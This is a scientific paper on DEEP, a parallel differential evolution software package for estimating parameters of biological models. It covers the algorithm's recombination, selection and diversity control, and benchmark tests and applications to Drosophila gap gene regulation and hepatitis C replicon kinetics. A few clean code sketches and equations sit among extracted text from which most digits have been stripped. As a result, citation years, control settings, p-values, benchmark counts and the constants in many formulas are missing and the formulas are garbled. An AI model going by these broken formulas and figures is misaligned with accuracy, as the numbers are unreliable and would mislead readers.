mathematical description and the values of the unknown constants and control parameters that represents the coefficients of underlying biochemical reactions. these unknowns are to be found as a best suited solution to an inverse problem of mathematical modeling, i.e., by the fitting model output to experimental observations. 
the parameter set is to be reliable, and different types of data are to be considered. development of reliable and easy-to-use algorithms and programs for solution of the inverse problem remains a challenging task due to the diversity and high computational complexity of biomedical applications, as well as the necessity to treat large sets of heterogeneous data. in systems biology the commonly used global optimization algorithm is parallel simulated annealing (sa) (chu, deng & reinitz, ). this method requires considerable cpu time, but is capable of eventually finding the global extremum and runs efficiently in parallel computations. however, the wide range of methods called genetic algorithms (ga) was developed later and successfully applied to biological problems (spirov & kazansky, ). modern evolutionary algorithms such as evolution strategies (ess) or differential evolution (de) can outperform other methods in the estimation of parameters of several biological models (fomekong-nanfack, kaandorp & blom, ; fomekong-nanfack, ; suleimenov, ). the general challenge in the efficient implementation of global optimization methods is that they depend on problem-specific assumptions and thus cannot be easily adapted to other problems. for example, in sa both the final result and the computational time depend on the so-called cooling schedule, the success of ga optimization strongly depends on the selected mutation, recombination and selection rules, and evolutionary algorithms heavily rely on the algorithmic parameters which define the model of evolution. currently, many approaches based on metaheuristics exist for parameter estimation in biology. for example, enhanced scatter search (egea, martí & banga, ), implemented in the meigor (metaheuristics for systems biology and bioinformatics global optimization) package for the r statistical language, was reported to outperform state-of-the-art methods (egea et al., ). this method can provide high-quality solutions for integer and real parameters; however, it is computationally expensive. we developed deep, a software package that implements the differential evolution entirely parallel (deep) method introduced recently (kozlov & samsonov, ). the rationale behind the design of this programme was to provide open source software with performance comparable to competitive packages, as well as to allow a user to implement both the mathematical model and the comparison of the solution with experimental data in any software package or programming language, such as r, octave, python or others. problem statement the deep method was developed to solve the inverse problem of mathematical modeling. for a given mathematical model with parameters $q \in \mathbb{R}^K$, where $K$ is the number of parameters, and observable data $Y$, we seek the vector $\hat{q}$:

$$\hat{q} = \arg\min_q F(q, Y) \qquad (1)$$

where $F$ is a measure of the deviation of the model prediction from the observable data. additional constraints may be imposed:

$$h_j(q) = 0, \quad j = 1, \ldots, N_h \qquad (2)$$
$$g_m(q) \le 0, \quad m = 1, \ldots, N_g \qquad (3)$$
$$q_k^L < q_k < q_k^U, \quad k \in I \subset \{1, \ldots, K\} \qquad (4)$$

where $N_h$ and $N_g$ are the numbers of constraints in the form of equalities and inequalities, respectively, and $I \subset \{1, \ldots, K\}$ denotes the set of indices of parameters with box constraints. several objective functions can be combined:

$$F(q, Y) = \bigoplus_{i=1}^{N_F} f_i(q, Y) \qquad (5)$$

where $\bigoplus$ denotes one of the aggregation methods—summation or maximization.
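for readers who prefer code to notation, the sketch below restates the problem statement in python. it is not part of the deep package: the exponential-decay model, the synthetic data and the two partial objectives are hypothetical placeholders chosen only to show how several objectives can be aggregated by summation or maximization in the sense of (5).

```python
# illustrative only: a toy inverse problem with two partial objectives.
import numpy as np

t = np.linspace(0.0, 10.0, 50)
rng = np.random.default_rng(0)
y_obs = 3.0 * np.exp(-0.5 * t) + 0.05 * rng.normal(size=t.size)  # synthetic "data"

def model(q):
    rate, scale = q
    return scale * np.exp(-rate * t)

def f1(q, y):
    # one partial objective: residual sum of squares between model and data
    return float(np.sum((model(q) - y) ** 2))

def f2(q, y):
    # a second partial objective: deviation at the final time point
    return abs(float(model(q)[-1] - y[-1]))

def F(q, y, aggregate=sum):
    # combined objective in the sense of eq. (5): summation or maximization
    return aggregate([f1(q, y), f2(q, y)])

print(F((0.5, 3.0), y_obs))                 # aggregation by summation
print(F((0.5, 3.0), y_obs, aggregate=max))  # aggregation by maximization
```

in deep itself the objective is supplied by the user as an external program or script, so the package never needs to know the structure of the model; the snippet above only mirrors the mathematical formulation.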
differential evolution entirely parallel method the main algorithm differential evolution (de) was proposed in storn & price ( ) as an effective stochastic method for function minimization. de deals with a set (population) of randomly generated parameter vectors (individuals). the population on each iteration is referred to as generation, moreover, a size of population np is fixed. deep method (kozlov & samsonov, ) incorporates two enhancements found in literature, as well as some elaborated modifications. these enhancements consist in the ‘‘trigonometric mutation’’ rule proposed in fan & lampinen ( ) and used to take into account a value of the objective function for each individual at the recombination step, and the adaptive scheme for selection of internal parameters based on the control of the population diversity developed in zaharie ( ). the motivation to select these enhancements was to make algorithm more suitable for biological problems containing big data sets and not properly defined objective function. the key concept behind the deep method is the age of individual defined as a number of generations, during which the individual survived without any change of its parameter vector. the failure to update the parameter values indicates a convergence to a local minimum. to avoid it we propose to substitute the number of oldest individuals with the same number of the best ones after the predefined number of iterations . to enhance the method further we incorporated an optional scatter search step (egea, martí & banga, ) that is performed each iteration, where is a control parameter. the specified number of best individuals is used to produce np offsprings. to increase the reliability of the deep method we implemented a new selection rule, described in detail in kozlov et al. ( ), in which several different objective functions are considered in order to accept or reject an offspring to new generation. this feature permits to combine different types of experimental observations and the a priori information in one and the same fitting procedure. kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm . differential evolution entirely parallel method initialization: the population is initialized randomly. iteration = while stopping criterion is not met do iteration = iteration + recombination: if the predefined number of iterations passed. then make scatter search step else for all individuals in population do recombine (individual) end for end if evaluation: objfunc (population) selection: for all offsprings do select (offspring) end for adaptation: update scaling and crossover parameters. if the predefined number of iterations passed. then substitute oldest individuals with the best ones. end if sort the population members by age and by quality. end while the operation of the method is described in the algorithm insertion. the execution starts with initialization block in which a set of np parameter vectors vg, of length k is randomly assigned the values satisfying the given constraints qlk <qk <q u k , k= ,...,k . the main loop of the algorithm consists of recombination, evaluation, selection and adaptation blocks that are detailed below. calculations are terminated when the objective function variation becomes less than a predefined value during the several consecutive steps or the maximal number of generations gmax is exceeded. objective function f for several vectors is calculated in parallel. 
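to make the structure of algorithm 1 easier to follow, a compact python sketch of the generation loop is given below. it is purely structural and is not the c implementation: the recombination step is replaced by a simple random perturbation (the full trial-vector construction is described in the next section), the objective is a toy sphere function, and all parameter names and default values are assumptions, not part of the deep api.

```python
# structural sketch of algorithm 1 (illustrative only, not the deep package).
import random

def deep_loop(objective, bounds, np_size=20, g_max=100,
              substitution_period=10, n_substitute=3):
    dim = len(bounds)
    pop = [[random.uniform(lo, hi) for lo, hi in bounds] for _ in range(np_size)]
    fit = [objective(ind) for ind in pop]
    age = [0] * np_size
    for iteration in range(1, g_max + 1):
        # recombination block (placeholder perturbation instead of the real de rules)
        offspring = [[x + random.gauss(0.0, 0.1) for x in ind] for ind in pop]
        # evaluation block (deep evaluates these candidates in parallel worker threads)
        off_fit = [objective(ind) for ind in offspring]
        # selection block: the offspring replaces its parent if it is better;
        # the age of an individual resets whenever its parameter vector changes
        for i in range(np_size):
            if off_fit[i] < fit[i]:
                pop[i], fit[i], age[i] = offspring[i], off_fit[i], 0
            else:
                age[i] += 1
        # adaptation / age control: periodically replace the oldest members
        # with copies of the best ones to escape local minima
        if iteration % substitution_period == 0:
            oldest = sorted(range(np_size), key=age.__getitem__, reverse=True)
            best = sorted(range(np_size), key=fit.__getitem__)
            for o, b in zip(oldest[:n_substitute], best[:n_substitute]):
                pop[o], fit[o], age[o] = list(pop[b]), fit[b], 0
    return min(zip(fit, pop))

best_f, best_q = deep_loop(lambda q: sum(x * x for x in q), [(-5.0, 5.0)] * 3)
print(best_f, best_q)
```

the age-based substitution in the last block is the distinguishing feature of deep discussed above: stagnating individuals are detected by their age rather than by their objective value alone.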
the size of the population np, the frequencies of old population member substitution and of the scatter search step, together with the number of substituted individuals and the maximal number of iterations gmax, are the main control parameters of the method. constraints handling using the deep method, one can solve both unconstrained and constrained optimization problems. upper and lower bounds are to be defined for each parameter for initialization. constraints may be imposed in the form of inequalities or equalities for a subset of parameters or their combinations. constraints in the form (2), (3) can be reduced by maximization or summation:

$$H(q,Y) = \bigoplus_{j=1}^{N_h} H_j(q,Y); \qquad G(q,Y) = \bigoplus_{m=1}^{N_g} G_m(q,Y),$$

where $H_j$ and $G_m$ are the violations of the corresponding constraints $h_j$ and $g_m$, and $\bigoplus$ denotes one of the aggregation methods—summation or maximization. the aggregated violations are then added to the objective:

$$F(q,Y) = F(q,Y) + H(q,Y) + G(q,Y).$$

however, the box constraints in the form (4), which may be imposed for a subset $I$ of parameters $q_k$, $k \in I$, are to be transformed. to do it, let us introduce the new parameters $u_k$:

$$q_k = \alpha_k + \beta_k \sin(u_k) \quad \text{or} \quad q_k = \alpha_k + \beta_k \tanh(u_k), \qquad \alpha_k = (q_k^U + q_k^L)/2, \; \beta_k = (q_k^U - q_k^L)/2.$$

consequently, deep is applied to determine the unconstrained parameters $u_k$. the impact of different algorithmic parameters on method convergence was discussed in kozlov & samsonov ( ). recombination strategy

algorithm 2. recombination
proc recombine (individual) = {
  select two other random individuals.
  build the combined trial vector using (6).
  generate the random index of parameter i.
  for all parameters starting from i do
    generate the random number u.
    if (u < probability of crossover) then
      take this parameter from the first trial vector to the offspring
    else if (u < 1 − probability of crossover) then
      take this parameter from the second trial vector to the offspring
    else
      leave this parameter as is in the offspring
    end if
  end for
}

the recombination step is demonstrated in the algorithm insertion. let $v_{i,0}$, $i = 1, \ldots, NP$, denote the set of randomly generated parameter vectors for the initial generation $j = 0$, $v_{i,j} = \{v_{i,j}(k)\} = (q_k^i)_{k=1,\ldots,K}$, where $K$ is the number of parameters $q$ and $NP$ is the fixed size of the set. the first trial vector for index $g$ is calculated by:

$$v^1_{g,j+1} = v_{a,j} + S \circ (v_{b,j} - v_{c,j})$$

where $v_a$, $v_b$ and $v_c$ are different members of the current generation $j$ with randomly chosen indices $a$, $b$ and $c$, $S$ is a vector of scaling constants for each parameter, and $\circ$ denotes element-wise multiplication. the second, optional trial vector is calculated using the ‘‘trigonometric mutation rule’’ (fan & lampinen, ):

$$v^2_{g,j+1} = \frac{v_{a,j} + v_{b,j} + v_{c,j}}{3} + (\varphi_b - \varphi_a)(v_{a,j} - v_{b,j}) + (\varphi_c - \varphi_b)(v_{b,j} - v_{c,j}) + (\varphi_a - \varphi_c)(v_{c,j} - v_{a,j})$$

where $\varphi_\bullet = |F(v_{\bullet,j})|/\varphi^*$, $\bullet = a, b, c$, $\varphi^* = |F(v_{a,j})| + |F(v_{b,j})| + |F(v_{c,j})|$, and $F(x)$ is the main objective function to be minimized. the combined trial vector in the case of the binomial recombination type is defined as follows:

$$v_{g,j+1}(k) = \begin{cases} v^1_{g,j+1}(k), & \text{if } r_k < p_k,\\ v^2_{g,j+1}(k), & \text{else if } r_k < 1 - p_k,\\ v_{g,j}(k), & \text{otherwise} \end{cases} \qquad (6)$$

where $r_k = U(0,1)$ is a random number uniformly distributed between 0 and 1, and $p$ is the vector of crossover probabilities for all parameters. in the case of the exponential type of recombination, the first trial vector $v^1_{g,j+1}$ is used continuously for all parameters $k$ until the random number becomes bigger than $p$.
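the trial-vector construction just described can be condensed into a short illustrative function. this is a sketch of the binomial variant only, not the package's code: the per-parameter scaling and crossover vectors of the text are collapsed to scalars s and p here, and the demo population at the end is a hypothetical toy example.

```python
# illustrative sketch of the recombination strategy above (binomial variant).
import random

def build_offspring(g, population, fitness, s, p):
    np_size, dim = len(population), len(population[0])
    a, b, c = random.sample([i for i in range(np_size) if i != g], 3)
    va, vb, vc = population[a], population[b], population[c]
    # first trial vector: v1 = v_a + s * (v_b - v_c)
    v1 = [va[k] + s * (vb[k] - vc[k]) for k in range(dim)]
    # second trial vector: trigonometric mutation (fan & lampinen)
    phi_star = abs(fitness[a]) + abs(fitness[b]) + abs(fitness[c]) or 1.0
    pa, pb, pc = (abs(fitness[i]) / phi_star for i in (a, b, c))
    v2 = [(va[k] + vb[k] + vc[k]) / 3.0
          + (pb - pa) * (va[k] - vb[k])
          + (pc - pb) * (vb[k] - vc[k])
          + (pa - pc) * (vc[k] - va[k]) for k in range(dim)]
    # binomial crossover between the two trial vectors and the parent
    parent, offspring = population[g], []
    for k in range(dim):
        r = random.random()
        if r < p:
            offspring.append(v1[k])
        elif r < 1.0 - p:
            offspring.append(v2[k])
        else:
            offspring.append(parent[k])
    return offspring

# toy usage example
pop = [[random.uniform(-5.0, 5.0) for _ in range(4)] for _ in range(10)]
fit = [sum(x * x for x in ind) for ind in pop]
print(build_offspring(0, pop, fit, s=0.7, p=0.3))
```

the trigonometric vector pulls the offspring toward the best of the three sampled individuals because each difference term is weighted by the normalized objective values, which is why the text describes it as taking the objective function into account at the recombination step.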
scatter search step let us consider vg,j, g = ,..., as the best members of current generation j sorted according to the value of the objective function f such that f(v ,j) < f(v ,j) < ···< f(v ,j) as described in egea, martí & banga ( ). each vector vb,j is to be combined with the rest of vectors va,j,∀a, a∈[ , ,..., ], a =b. two new points within the search space are defined: c =v b,j −d( +αβ); c =v b,j +d( −αβ); d = va,j−vb,j , where α= { if b<a − if b>a, β= |a−b|− − . then the offspring is created according to the formula: vb,j+ =c +(c −c )◦r, where r ={rk}, rk =u( , ), k = ,...,k is a random number uniformly distributed between and . kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. selection rule algorithm . selection proc select (individual) = { if (f < the value of the parent) then accept offspring else for all criteria fi, hj, gm as f do if (f < the value of the parent) then generate the random number u . if (u < control parameter for this criterion) then accept offspring end if end if end for end if } in order to increase the robustness of the procedure we have implemented the follow- ing selection rule for de, described in detail in kozlov et al. ( ) (see the algorithm insertion). briefly, several different objective functions are used to decide if an offspring will be selected for a new generation. firstly, the main objective function is checked. the offspring replaces its parent if the value of this function for offspring’s set of parameters is less than that for the parental one. in the opposite case the additional objective functions are considered. the offspring replaces its parent if the value of any other objective function is better, and a randomly selected value is less than the predefined parameter for this function. preserving population diversity the original de algorithm was highly dependent on internal parameters as reported by other authors, see, for example (gaemperle, mueller & koumoutsakos, ). an efficient adaptive scheme for selection of internal parameters sk and pk based on the control of the population diversity was proposed in zaharie ( ). let us consider the variation for parameter k in the current generation: vark = np np∑ i= ( qik− np np∑ l= qlk ) where k= ,...,n. for the next generation the scaling constant is calculated by sk =   √ np ·(ρk− )+pk( −pk) ·np ·pk np ·(ρk− )+pk( −pk)≥ sinf np ·(ρk− )+pk( −pk)< kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. or alternatively the crossover probability is adopted as pk = { −(np ·s k− )+ √ (np ·s k− ) −np ·( −ρk) ρk ≥ pinf ρk < where sinf = / √ np, pinf = , ρk =γ ( varpreviousk /vark ) and γ is a new constant that controls the decrease of the variability of parameters in the course of iteration process. mixed integer-real problems de operates on floating point parameters, while many real problems contain integer parameters, e.g., indices of some kind. two algorithms for parameter conversion from real to integer are implemented in deep method as described in kozlov et al. ( ). the first method rounds off a real value to the nearest integer number. the second procedure consists of the following steps: • the values are sorted in ascending order. • the index of the parameter in the floating point array becomes the value of the parameter in the integer array. parallelization of objective function calculation algorithm . 
objective function proc objfunc (population) = { create a pool of a specified number worker threads. create an asynchronous queue of tasks q in the pool. for all individuals in population as x do push x to queue q. end for wait all worker threads in the pool to finish. } proc worker thread (parameters) = { . transform parameters from real to integer as needed. . save parameters into temporary file of specified format. . call specified program and supply the temporary file to it. . capture output of the program. . split output with specified delimiters into a list of values. . assign values in the specified order to fi, hj, gm,∀i,j,m. . return worker thread to pool. } kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. deep can be effectively parallelized due to independent evaluation of each population member. various models for evolutionary algorithms parallelization have been developed, such as master-slave, island, cellular or hybrid versions (tasoulis et al., ). the approach implemented in deep (see the algorithm insertion) utilizes the multicore architecture of modern cpus and employs the pool of worker threads with asynchronous queue of tasks to evaluate the individual solutions in parallel. the calcu- lation of objective function for each trial vector using the command supplied by a user is pushed to the asynchronous queue and starts as soon as there is an available thread in the pool. such approach is similar to ‘‘guided’’ schedule in openmp but gives us more flexibility and control. the command output is automatically recognized according to the specified format. all threads started in the current iteration are to be finished before the next one starts. implementation deep is implemented in c programming language as console application and employs interfaces from glib project (https://developer.gnome.org/glib/), e.g., thread pool api. the architecture allows a user to utilize any programming language or computer system, such as r, octave or python to implement both mathematical model and comparison of solution with experimental data. control parameters all the control parameters are specified in the single input file as a key-value pairs in ini- format supplied to the deep executable on the command line. the control parameters are arranged into three groups described below. mathematical model section specifies the parameter number, both the lower and upper parameter bounds, as well as the software itself necessary to run a model. a possibility is provided to indicate parameters that are to be kept unchanged. objective function section defines the aggregation methods for constraints and multiple objectives. the type of function, i.e., main or additional objective, equality or inequality constraint, is denoted by special keyword. ranks and weights are to be given here. method settings section allows the user to tune the settings, namely, population size, stopping criterion, offspring generation strategy, the number of the oldest individuals to be substituted in the next generation , the maximal number of working threads and the seed for random number generator. two options for offspring generation are provided, namely the selection of best individual or ‘‘trigonometric mutation.’’ the stopping criterion can limit the convergence rate, absolute or relative value of the objective function, number of generations or the wall clock time. 
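to make the worker-thread protocol of algorithm 4 concrete, the following hypothetical user-side evaluator shows what the external program called by deep might look like. everything in it is an assumption for illustration: the one-number-per-token parameter file, the one-value-per-line output and the toy objective are placeholders, since the actual file format, delimiters and the command line are whatever the user configures in the ini input file described above.

```python
#!/usr/bin/env python3
# hypothetical external evaluator: deep writes candidate parameters to a
# temporary file, runs this script with that file as its argument, captures
# the printed values and assigns them, in order, to the objectives and
# constraint violations (f_i, h_j, g_m).
import sys

def main():
    if len(sys.argv) != 2:
        sys.exit("usage: evaluate.py <parameter-file>")
    with open(sys.argv[1]) as fh:
        q = [float(tok) for tok in fh.read().split()]
    # toy "model": main objective f, one equality violation h, one inequality violation g
    f = sum(x * x for x in q)
    h = abs(sum(q) - 1.0)
    g = max(0.0, q[0] - 0.5)
    print(f)
    print(h)
    print(g)

if __name__ == "__main__":
    main()
```

because every candidate is evaluated by an independent external process of this kind, the pool of worker threads can run several evaluations concurrently, which is exactly what the asynchronous task queue described above is for.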
the initial population is by default generated randomly within the limits given; however, it is also possible to define one initial guess and generate the individuals in the specified vicinity of it. programming interfaces the deep method can be used as the static or dynamic shared object and embedded in another software package. application programming interfaces (apis) can be used to kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://developer.gnome.org/glib/ http://dx.doi.org/ . /peerj-cs. connect with existing code implementing mathematical model and objective function. this approach is often preferred in academic and industrial applications where the high level modeling system language is not sufficient or the computation time should be reduced. results method testing on benchmark functions to evaluate the performance of deep we used three simple multimodal test functions of dimension d= from the competition on real parameter single objective optimization (cec- ) test suite (liang, qu & suganthan, ), namely: shifted and rotated griewank’s function. h(x)=h ( m ( (x−oh) )) + ; h(x)= d∑ i= x i − d∏ i= cos ( xi √ i ) + shifted rastrigin’s function. r(x)=r ( . (x−or) ) + ; r(x)= d∑ i= (x i − cos( πxi)+ ) shifted schwefel’s function. s(x)= s ( (x−os) ) + ; s(x)= . ×d− d∑ i= g(zi(xi)), where zi=xi+ . x , and g(zi)=   zisin(|zi| / ) if |zi|< , ( −mod(zi, ))∗ ∗sin (√ | −mod(zi, )| ) − − (zi− ) d if zi > , (mod(|zi|, )− )∗ ∗sin (√ |mod(zi, )− | ) − − (zi+ ) d if zi <− , and the global optimum is shifted to oi =[oi ,oi ,...,oid]t and rotated using the rotation matrix mi. for each function runs were performed with identical settings and with random initial population. the maximal allowed number of functional evaluations was set to × . other deep settings were np = , gmax = , and = . the measured error was the difference between the known optimal value and the obtained solution. following the methodology described in tanabe & fukunaga ( ) we used the wilcoxon rank-sum test with significance level p < . to compare the evaluation kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table the results of statistical comparison of deep with the top three methods from cec- on functions. the symbols+,−,≈ indicate that deep performed significantly better (+), significantly worse (−), or not significantly different (≈) compared to another algorithm using the wilcoxon rank- sum test (significantly, p< . ). all results are based on runs. deep vs cmlp l-shade umoeas − (worse) ≈ (no sig.) + (better) results for runs with the results of the top three methods from cec- (liang, qu & suganthan, ) taken from cec- report: . covariance matrix learning and searching preference (cmlp) (chen et al., ), . success-history based parameter adaptation for differential evolution (l-shade) (tanabe & fukunaga, ), . united multi-operator evolutionary algorithms (umoeas) (elsayed et al., ). the number of benchmark functions from three tested (+), (−), (≈) is presented in table . deep demonstrated the same or better performance. the method test on reduced model of gene regulation to demonstrate how deep works in applications we developed a realistic benchmark problem based on real biological model of gap gene regulatory network (kozlov et al., b). 
a model provides a dynamical description of gap gene regulatory system, using detailed dna-based information, as well as spatial tf concentration data at varying time points. the gap gene regulatory network controls segment determination in the early drosophila embryo (akam, ; jaeger, ; surkova et al., ). the state variables of this model are the concentrations of mrnas and proteins encoded by four gap genes hb, kr, gt, and kni. the model implements the thermodynamic approach in the form proposed in he et al. ( ) to calculate the expression of a target gene at the rna level. this level is proportional to the gene activation level also called the promoter occupancy, and is determined by concentrations of eight transcription factors hb, kr, gt, kni, bcd, tll, cad and hkb: eai (t)= zaon,i(t) zaon,i(t)+z a off,i(t) ( ) where zaon,i(t) and z a off,i(t) are statistical weights of the enhancer with the basal transcriptional complex bound and unbound, respectively. two sets of the reaction–diffusion differential equations for mrna uai (t) and protein concentrations vai (t) describe the dynamics of the system (reinitz & sharp, ; jaeger et al., ; kozlov et al., ): duai /dt =r a ue a i (t)+d a u(n)[(u a i− −u a i )+(u a i+ −u a i )]−λ a uu a i , ( ) dvai /dt =r a vu a i (t−τ a v )+d a v(n)[(v a i− −v a i )+(v a i+ −v a i )]−λ a vv a i , ( ) where n is the cleavage cycle number, rav and r a u are the maximum synthesis rates, d a v, d a u (to smooth the resulting model output) are the diffusion coefficients, λav and λ a u are the kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. decay rates for protein and mrna of gene a. the model spans the time period of cleavage cycles and a (c and c resp.) and the interval of a-p axis from % to % ( nuclei) of embryo length. the number of nuclei along the a-p axis is doubled when going from c to c . the model is fitted to data on gap protein concentrations from the flyex database (pisarev et al., ) and mrna concentrations from superfly (cicin-sain et al., ). to fit the model we used the residual sum of squared differences between the model output and data and we used the weighted pattern generation potential proposed in samee & sinha ( ) as the second objective function: rss(x,y)= ∑ ∀g,n,t:∃y g n (t) (xgn (t)−y g n (t)) wpgp(x,y)= +(penalty(x,y)−reward(x,y)) where g, n and t are gene, nucleus and time point respectively and reward(x,y)= ∑ iyi∗min(yi,xi)∑ iyi∗yi penalty(x,y)= ∑ i(ymax−yi)∗max(xi−yi, )∑ i(ymax−yi)∗ ∑ i(ymax−yi) were xi and yi are respectively predicted and experimentally observed expression in nucleus i, and ymax is the maximum level of experimentally observed expression. conse- quently, the combined objective function is defined by: f(q,y )= ∗ − ∗rss(v(q),v )+ . ∗ − ∗rss(u(q),u) +wpgp(v(q),v )+ . ∗wpgp(u(q),u) + − ∗penalty(q), ( ) where y ={v,u} contains data for u and v, and the function penalty limits the growth of regulatory parameters, and the weights were obtained experimentally. we simplified the original computationally expensive model (kozlov et al., b) to use it as a benchmark in our calculations as follows. firstly, we reduced the number of nuclei from to and considered only one target gene with dna sequence from kni. consequently, the number of parameters was reduced to , two of which are of integer type. biologically feasible box constraints in the form ( ) are imposed for parameters. 
next, we fitted this reduced model to the coarsened data and used the obtained solution and model parameters as the synthetic data for benchmark. thus, the exact parameters of benchmark optimization problem are known. to compare deep and meigor (egea et al., ) we run both methods in the same conditions and record the final value of the objective function ( ), final parameters and the number of functional evaluations. we considered those solutions for which the final functional value is less than . that corresponds to parameters close to exact known values. the welch two sample t-test demonstrated that deep used less objective function evaluations than meigor with p< . (see fig. ). real applications deep software was successfully applied to explain the dramatic decrease in gap gene expression in early drosophila embryo caused by a null mutation in kr gene. figure a kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure comparison of number of objective function evaluations for deep and meigor on reduced model of gene regulation. deep used less objective function evaluations than meigor with p < . according to welch two sample t-test. presents the topology of regulatory network inferred by fitting the dynamical model with parameters of gap gene expression to the wild type and kr mutant data simultaneously (kozlov et al., ). other deep applications include different problems described in ivanisenko et al. ( ); nuriddinov et al. ( ). recently, deep was used in the online ancestry prediction tool readmix that can identify the biogeographic origins of highly mixed individuals (kozlov et al., a). readmix is available at http://chcb.saban-chla.usc.edu/readmix/. two applications are discussed below in details. subgenomic hepatitis c virus replicon replication model the hepatitis c virus (hcv) causes hazardous liver diseases leading frequently to cirrhosis and hepatocellular carcinoma. no effective anti-hcv therapy is available up to date. design of the effective anti-hcv medicine is a challenging task due to the ability of the hepatitis c virus to rapidly acquire drug resistance. the cells containing hcv subgenomic replicon are widely used for experimental studies of the hcv genome replication mechanisms and the in vitro testing of the tentative medicine. hcv ns / a protease is essential for viral replication and therefore it has been one of the most attractive targets for development of specific antiviral agents for hcv. we used the new algorithm and software package to determine parameters (kinetic reaction constants) of the mathematical model of the subgenomic hepatitis c virus kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://chcb.saban-chla.usc.edu/readmix/ http://dx.doi.org/ . /peerj-cs. figure gene regulatory network, arrows and t-ended curves indicate activation and repressive inter- actions respectively, dotted lines show interactions present in wild type only (a). regulatory weights of in- dividual transcription factor binding sites (b). evolution of three objective functions during parameter fit- ting (c). see text for details. (hcv) replicon replication in huh- cells in the presence of the hcv ns protease inhibitor, see ivanisenko et al. ( ). the experimental data include kinetic curves of the viral rna suppression at various inhibitor concentrations of the vx- and biln- inhibitors (lin et al., ; lin et al., ). we seek for the set of parameters that minimizes three criteria. 
the main criterion (rss) is the residual sum of squared differences between the model output and data. additional criteria (f ) and (f ) penalize the deviation of the time to steady state and the number of viral vesicles at the steady state, respectively. the combined criterion was defined as follows: fcombined=rss+ . ·f + . ·f ( ) where the weights were obtained experimentally. the dependence of the best value of the combined criterion ( ) in population of individuals on the generation number for runs is plotted in fig. a. the objective function is to be evaluated once for each member of the generation, the size of which was set to . the plot of the criteria in the close vicinity of the optimal values of the two parameters from the set is shown in figs. b and c. despite of the fact that the criteria do not take a minimal values in one and the same point, the algorithm produces reliable approximation of the optimum. the comparison of the model output and experimental dependencies of the viral rna suppression rate on inhibitor concentration is shown in figs. d and e. it is worth to note that, the model correctly reproduces experimental kinetics of the viral rna suppression. the predictive power of the model was estimated using the experimental data on dependencies of the viral rna suppression rate on the increasing concentration of the sch- (malcolm et al., ) and itmn- (seiwert et al., ) inhibitors. these kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure (a) the combined criterion ( ) vs. the generation number for runs. function eval- uations were performed by the minimization procedure for each generation. (b, c) the criteria graphs are shown in the close vicinity of the optimal values of the four parameters. the values of the parameters found by the algorithm are denoted as x and y. (d, e) the viral rna suppression in the presence of the ns protease inhibitors in different concentrations. the dependence of the viral rna suppression on the increasing concentration of biln- (d) and vx- (e) inhibitors is shown for the third day post- treatment. a solid line is used to show model output and points correspond to the experimental data (lin et al., ; lin et al., ). (f, g) the predicted kinetics and the suppression rate of the viral rna in comparison with data not used for parameter estimation. the dependencies of the suppression rate of the viral rna on the increasing concentration of the sch- (f) and itmn- (g) inhibitors (mal- colm et al., ; seiwert et al., ). data were not used for parameter estimation. as it can be seen in figs. f and g, the model correctly reproduces experimental observations and thus can be used for in silico studies. sequence-based model of the gap gene regulatory network recently, deep method was successfully applied to recover parameters of the dna sequence-based model ( )–( ) of regulatory network of gap genes—hb, kr, gt, and kni— and transcription factors: hb, kr, gt, kni, bcd, tll, cad and hkb (kozlov et al., b). the trained model provides a tool to estimate the importance of each tf binding site for the model output (see fig. b). we showed that functionally important sites are not exclusively located in cis-regulatory elements and that sites with low regulatory weight are important for the model output (kozlov et al., ). the evolution of the three objective functions during one optimization run is shown in fig. c. 
note that the wpgp and the penalty functions do not decline monotonically and simultaneously. in a few first steps these functions reach their maximal values while rss falls sharply, that corresponds to the adaptation of the control parameters of the algorithm and substitution of old parameter sets with good ones. then wpgp starts to decay, and penalty fluctuates at high level, while rss decays approximately at the same rate as wpgp. as penalty depends only on regulatory parameters, its behaviour at this stage illustrates that it disallows the process to be trapped in some local minimum with extreme values of parameters. during the second half of the optimization process, penalty kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. reaches its final low level and stays at it almost constant till convergence while the rss and wpgp exhibit a modest growth and then converge. this illustrates the ability of deep to balance several objective functions. the model output at this stage is not changed much as indicated by rss though the absolute values of regulatory parameters are fine tuned. conclusions the parallelization of objective function calculation implemented in deep method considerably reduces the computational time. several members of the current generation are evaluated in parallel, which in our experience with sequence-based model of the gap gene regulatory network, resulted in times speedup on core computational node (intel xeon , joint supercomputer center of the russian academy of sciences, moscow). the calculation of objective functions in parallel threads took approximately the same s as one sequential job, and the optimization runs were able to converge in h after approximately , functional evaluations. to sum up, we elaborated both the method and the software, which demonstrated high performance on test functions and biological problems of finding parameters in dynamic models of biological processes by minimizing one or even several objective functions that measure the deviation of model solution from data. acknowledgements we are thankful to the joint supercomputer center of the russian academy of sciences, moscow, for provided computational resources. additional information and declarations funding the implementation and testing was supported by rsf grant no. - - , the method development was supported by rfbr grant - - and the programme ‘‘ - - ’’ by the russian ministry of science and education. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: rsf: - - . rfbr: - - . russian ministry of science and education: - - . competing interests the authors declare there are no competing interests. author contributions • konstantin kozlov conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • alexander m. samsonov conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. • maria samsonova conceived and designed the experiments, wrote the paper, reviewed 